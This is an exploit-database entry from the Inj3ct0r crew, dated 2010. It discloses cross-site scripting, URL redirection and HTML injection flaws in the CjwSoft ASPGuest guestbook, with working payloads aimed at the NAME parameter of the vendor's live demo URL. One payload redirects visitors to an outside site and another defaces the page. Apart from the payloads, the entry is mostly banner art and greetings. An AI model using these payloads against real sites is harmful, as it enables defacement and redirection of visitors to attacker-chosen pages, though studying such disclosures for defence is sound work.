Lucene search
L0rd CrusAd3r1337DAY-ID-13660HistoryAug 12, 2010 - 12:00 a.m.
CjwSoft ASPGuest Multiple Vulnerability
2010-08-1200:00:00
L0rd CrusAd3r
0day.today
23
Exploit for asp platform in category web applications
=======================================
CjwSoft ASPGuest Multiple Vulnerability
=======================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################### 1
0 I'm L0rd CrusAd3r member from Inj3ct0r Team 1
1 ########################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Author: L0rd CrusAd3r aka VSN [[email protected]]
Exploit Title: CjwSoft ASPGuest Multiple Vulnerability
Vendor url:http://www.cjwsoft.com
Published: 2010-08-12
GThanx to:r0073r (inj3ct0r.com), Sid3^effects, MaYur, MA1201, Sonic Bluehat, Sai, KD, M4n0j, The_Exploited, SeeMe, gunslinger_, Th3 RDX.
Greetz to : Inj3ct0r Exploit DataBase (inj3ct0r.com) , 0xr00t.com , members and my friends :) etc....
Special Greetz: Topsecure.net, inj3ct0r Team ,Andhrahackers.com
Shoutzz:- To all ICW & Inj3ct0r members.
~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~
Description:
Emoticon Support NEW
Cycles thru records in increments that you can easily change to any value you like.
Forward & Back Buttons are dynamically created on the fly and only show up when needed.
Easily customized since it's written with VBScript.
Password protected Web Administration entrance where you can edit and delete messages.
IP Tracking.
Server Side Form Validation.
~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~
Vulnerability:
**XSS Vulnerability**
DEMO URL :
Parameter:'"--><script>alert(0x000872)</script>
http://www.cjwsoft.com/aspguest4/guestbook/default.asp?NAME=[xss]
**URL Redirection Vulnerability**
DEMO URL:
Parameter:"><script type="text/javascript">window.location = "http://sonic.website.org"</script>
http://www.cjwsoft.com/aspguest4/guestbook/default.asp?NAME=[url redirection]
**HTML Injection**
DEMO URL:">><marquee><h1>XSS3d By L0rd CrusAd3r</h1><marquee>
Parameter:
http://www.cjwsoft.com/aspguest4/guestbook/default.asp?NAME=[html]
# 0day n0 m0re #
# L0rd CrusAd3r #
# 0day.today [2018-04-08] #